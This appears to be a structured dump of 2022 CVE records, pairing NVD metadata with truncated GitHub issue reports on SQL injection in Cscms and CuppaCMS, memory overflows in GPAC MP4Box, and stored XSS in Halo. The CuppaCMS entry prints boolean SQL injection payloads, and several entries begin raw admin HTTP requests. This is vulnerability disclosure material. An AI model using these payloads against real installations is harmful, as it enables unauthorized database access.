CVE-2022-27367
2022-04-15T18:15:10.440
Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Topic.php_del.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chshcms/cscms/issues/14#issue-1170457945" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chshcms:cscms:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "1865339A-4927-439D-9D16-D38C8330CB92", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/chshcms/cscms/issues/14#issue-1170457945
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chshcms", "cscms" ]
#### There is a SQL blind injection vulnerability in dance_Topic.php_del #### Details After the administrator is logged in, you need to add a song album ![image](https://user-images.githubusercontent.com/96719328/158503082-c3569a79-6b79-45d1-aeaf-5c6cd0d5bb47.png) ``` POST /admin.php/dance/admin/topic/save HTT...
SQL injection vulnerability exists in Cscms music portal system v4.2(dance_Topic.php_del)
https://api.github.com/repos/chshcms/cscms/issues/14/comments
0
2022-03-16T02:17:57Z
2022-03-16T02:17:57Z
https://github.com/chshcms/cscms/issues/14
1,170,457,945
14
CVE-2022-27368
2022-04-15T18:15:10.497
Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Lists.php_zhuan.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chshcms/cscms/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chshcms:cscms:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "1865339A-4927-439D-9D16-D38C8330CB92", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/chshcms/cscms/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chshcms", "cscms" ]
#### SQL injection vulnerability exists in Cscms music portal system v4.2 (dance_Lists.php_zhuan) #### Details After the administrator logs in, the following data package is constructed ``` POST /admin.php/dance/admin/lists/zhuan HTTP/1.1 Host: cscms.test Content-Length: 23 Accept: application/json, text/javas...
SQL injection vulnerability exists in Cscms music portal system v4.2
https://api.github.com/repos/chshcms/cscms/issues/15/comments
0
2022-03-16T02:25:23Z
2022-03-16T02:25:23Z
https://github.com/chshcms/cscms/issues/15
1,170,461,847
15
CVE-2022-27369
2022-04-15T18:15:10.557
Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component news_News.php_hy.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chshcms/cscms/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chshcms:cscms:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "1865339A-4927-439D-9D16-D38C8330CB92", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/chshcms/cscms/issues/16
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chshcms", "cscms" ]
#### There is a SQL blind injection vulnerability in news_News.php_hy #### Details After the administrator is logged in, a news needs to be added ![image](https://user-images.githubusercontent.com/96719328/158506380-f537906e-5519-4a24-822f-1a21bfc8fdd5.png) ``` POST /admin.php/news/admin/news/save HTTP/1.1...
SQL injection vulnerability exists in Cscms music portal system v4.2(news_News.php_hy)
https://api.github.com/repos/chshcms/cscms/issues/16/comments
0
2022-03-16T02:46:24Z
2022-03-16T02:55:29Z
https://github.com/chshcms/cscms/issues/16
1,170,472,919
16
CVE-2022-29537
2022-04-20T23:15:08.777
gp_rtp_builder_do_hevc in ietf/rtp_pck_mpeg4.c in GPAC 2.0.0 has a heap-based buffer over-read, as demonstrated by MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2173" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7AEE044-50E9-4230-B492-A5FF18653115", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
https://github.com/gpac/gpac/issues/2173
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough info...
[BUG] heap buffer overflow in gp_rtp_builder_do_hevc
https://api.github.com/repos/gpac/gpac/issues/2173/comments
0
2022-04-16T08:01:38Z
2022-08-03T09:45:02Z
https://github.com/gpac/gpac/issues/2173
1,206,048,984
2,173
CVE-2022-28074
2022-04-22T14:15:09.587
Halo-1.5.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via \admin\index.html#/system/tools.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/1769" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fit2cloud:halo:1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "C370E382-F3E0-4D9A-A9BF-C74F6695C69D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/halo-dev/halo/issues/1769
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
### What is version of Halo has the issue? 1.5.0 ### What database are you using? Other ### What is your deployment method? Fat Jar ### Your site address. _No response_ ### What happened? 作者你好,在部署环境的过程中,发现了一些问题。 希望在下一个版本中,能够进行一些安全的升级。 如下: 导出的文件未加密,可以修改内容,安全隐患: 用户将博客备份开源到互联网,遭到修改,可能导致存储型xss ![图片](http...
一些安全建议,建议隐藏
https://api.github.com/repos/halo-dev/halo/issues/1769/comments
1
2022-03-24T10:15:41Z
2022-03-24T10:17:20Z
https://github.com/halo-dev/halo/issues/1769
1,179,295,140
1,769
CVE-2022-1441
2022-04-25T17:15:36.547
MP4Box is a component of GPAC-2.0.0, which is a widely-used third-party package on RPM Fusion. When MP4Box tries to parse a MP4 file, it calls the function `diST_box_read()` to read from video. In this function, it allocates a buffer `str` with fixed length. However, content read from `bs` is controllable by user, so i...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/3dbe11b37d65c8472faf0654410068e5500b3adb" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Ad...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7AEE044-50E9-4230-B492-A5FF18653115", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
https://github.com/gpac/gpac/issues/2175
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
# Description When GPAC tries to parse a MP4 file, it calls the function `diST_box_read()` to read from video. In this funtion, it allocates a buffer `str` with fixed length. However, content read from `bs` is controllable by user, so is the length, which causes a buffer overflow. ``` char str[1024]; i=0; ...
GPAC-2.0.0 MP4Box: stack overflow with unlimited length and controllable content in diST_box_read
https://api.github.com/repos/gpac/gpac/issues/2175/comments
1
2022-04-16T08:21:46Z
2022-04-22T18:29:03Z
https://github.com/gpac/gpac/issues/2175
1,206,053,267
2,175
CVE-2022-27984
2022-04-26T14:15:41.557
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://cuppa.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/30" }, { "source": "nvd@nist.gov", "t...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/30
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
* VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/templates/default/html/windows/right.php" via the "menu_filter=2" parameters. * Contact me:wanghu29570@gmail.com * Product:CuppaCMS * Payload Boolean true: menu_filter=2' and '1'='1 * Payload Boolean false...
SQL injection vulnerability exists in CuppaCMS /administrator/templates/default/html/windows/right.php
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/30/comments
0
2022-03-21T16:24:23Z
2022-03-21T16:24:23Z
https://github.com/CuppaCMS/CuppaCMS/issues/30
1,175,630,195
30